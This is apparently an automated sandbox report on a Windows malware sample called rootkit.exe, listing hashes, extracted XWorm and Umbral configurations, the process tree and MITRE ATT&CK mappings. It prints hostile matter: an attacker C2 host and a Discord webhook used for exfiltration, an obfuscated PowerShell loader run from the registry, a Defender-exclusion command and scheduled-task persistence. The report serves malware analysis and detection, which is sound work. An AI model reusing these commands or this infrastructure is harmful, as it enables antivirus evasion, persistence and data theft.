Analysis
-
max time kernel
149s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
08-07-2024 17:43
Static task
static1
Behavioral task
behavioral1
Sample
rootkit.exe
Resource
win7-20240708-en
General
-
Target
rootkit.exe
-
Size
274KB
-
MD5
87119ce97d460721e8c6cb98f990c780
-
SHA1
eac69d7550546b7812eb5701e82e079ff780d93a
-
SHA256
f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
-
SHA512
fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb
-
SSDEEP
6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo
Malware Config
Extracted
xworm
5.0
127.0.0.1:49403
quotes-suites.gl.at.ply:49403
quotes-suites.gl.at.ply.gg:49403
25nhnSSJeo8OHnH7
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
umbral
https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/2068-14-0x0000000000E00000-0x0000000000E40000-memory.dmp family_umbral behavioral1/files/0x0009000000016bf7-13.dat family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000012291-6.dat family_xworm behavioral1/memory/2060-15-0x00000000013D0000-0x00000000013E0000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3056 created 428 3056 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2716 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2060 www.DeadSecObbbfuscation.exe 2068 Modify.exe 2724 www.DeadSec0000000000-obfusecator.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" rootkit.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3056 set thread context of 2148 3056 powershell.EXE 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d4f18d5ed1da01 powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1956 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2716 powershell.exe 3056 powershell.EXE 3056 powershell.EXE 2148 dllhost.exe 2148 dllhost.exe 2148 dllhost.exe 2148 dllhost.exe 2148 dllhost.exe 2148 dllhost.exe 1312 wmiprvse.exe 1312 wmiprvse.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1212 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2060 www.DeadSecObbbfuscation.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2068 Modify.exe Token: SeDebugPrivilege 3056 powershell.EXE Token: SeDebugPrivilege 3056 powershell.EXE Token: SeDebugPrivilege 2148 dllhost.exe Token: SeAuditPrivilege 860 svchost.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 2972 wrote to memory of 2060 2972 rootkit.exe 30 PID 2972 wrote to memory of 2060 2972 rootkit.exe 30 PID 2972 wrote to memory of 2060 2972 rootkit.exe 30 PID 2972 wrote to memory of 2068 2972 rootkit.exe 31 PID 2972 wrote to memory of 2068 2972 rootkit.exe 31 PID 2972 wrote to memory of 2068 2972 rootkit.exe 31 PID 2972 wrote to memory of 2716 2972 rootkit.exe 32 PID 2972 wrote to memory of 2716 2972 rootkit.exe 32 PID 2972 wrote to memory of 2716 2972 rootkit.exe 32 PID 2972 wrote to memory of 1956 2972 rootkit.exe 34 PID 2972 wrote to memory of 1956 2972 rootkit.exe 34 PID 2972 wrote to memory of 1956 2972 rootkit.exe 34 PID 2972 wrote to memory of 2724 2972 rootkit.exe 36 PID 2972 wrote to memory of 2724 2972 rootkit.exe 36 PID 2972 wrote to memory of 2724 2972 rootkit.exe 36 PID 2972 wrote to memory of 2724 2972 rootkit.exe 36 PID 2664 wrote to memory of 3056 2664 taskeng.exe 38 PID 2664 wrote to memory of 3056 2664 taskeng.exe 38 PID 2664 wrote to memory of 3056 2664 taskeng.exe 38 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 3056 wrote to memory of 2148 3056 powershell.EXE 40 PID 2148 wrote to memory of 428 2148 dllhost.exe 5 PID 2148 wrote to memory of 472 2148 dllhost.exe 6 PID 2148 wrote to memory of 488 2148 dllhost.exe 7 PID 2148 wrote to memory of 496 2148 dllhost.exe 8 PID 2148 wrote to memory of 600 2148 dllhost.exe 9 PID 2148 wrote to memory of 676 2148 dllhost.exe 10 PID 2148 wrote to memory of 752 2148 dllhost.exe 11 PID 2148 wrote to memory of 824 2148 dllhost.exe 12 PID 600 wrote to memory of 1124 600 svchost.exe 41 PID 600 wrote to memory of 1124 600 svchost.exe 41 PID 600 wrote to memory of 1124 600 svchost.exe 41 PID 2148 wrote to memory of 1124 2148 dllhost.exe 41 PID 2148 wrote to memory of 860 2148 dllhost.exe 13 PID 2148 wrote to memory of 972 2148 dllhost.exe 15 PID 2148 wrote to memory of 284 2148 dllhost.exe 16 PID 2148 wrote to memory of 892 2148 dllhost.exe 17 PID 2148 wrote to memory of 1076 2148 dllhost.exe 18 PID 2148 wrote to memory of 1088 2148 dllhost.exe 19 PID 2148 wrote to memory of 1168 2148 dllhost.exe 20 PID 2148 wrote to memory of 1212 2148 dllhost.exe 21 PID 2148 wrote to memory of 2032 2148 dllhost.exe 23 PID 2148 wrote to memory of 1312 2148 dllhost.exe 24 PID 2148 wrote to memory of 1444 2148 dllhost.exe 25 PID 2148 wrote to memory of 2276 2148 dllhost.exe 26 PID 2148 wrote to memory of 2452 2148 dllhost.exe 27 PID 2148 wrote to memory of 2060 2148 dllhost.exe 30 PID 2148 wrote to memory of 2068 2148 dllhost.exe 31 PID 2148 wrote to memory of 2664 2148 dllhost.exe 37 PID 2148 wrote to memory of 3056 2148 dllhost.exe 38 PID 2148 wrote to memory of 1784 2148 dllhost.exe 39 PID 2148 wrote to memory of 1124 2148 dllhost.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a2452c33-c5ab-4e6d-809b-15f4873b33e7}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1312
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1444
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:1124
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:824
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1168
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\taskeng.exetaskeng.exe {8ED4C929-B5AF-4994-9499-5E66336DC382} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+''+'w'+'s'+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:972
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:284
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:892
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1076
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1088
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:2032
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2276
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2452
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\rootkit.exe"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\Modify.exe"C:\Users\Admin\AppData\Local\Temp\Modify.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1956
-
-
C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"3⤵
- Executes dropped EXE
PID:2724
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1488989902-8233939581229876322-570263738871046913-1894565484-1302777071-363881733"1⤵PID:1784
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
164KB
MD522d120454dd38d7f1a3f1cd0eb497f95
SHA14c11a082bf8e64b21310b959821a9f7324aa8107
SHA2566fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA5121552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9
-
Filesize
229KB
MD59259d8aef8f52e8ff4fa082c0074c9b0
SHA188abb68a5632812be3c18e0c740e3818d9501b3e
SHA25645d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA5129cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede
-
Filesize
42KB
MD5737b2d60dc5d475685b65f5c288e00c0
SHA1144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA25669c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA51296a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6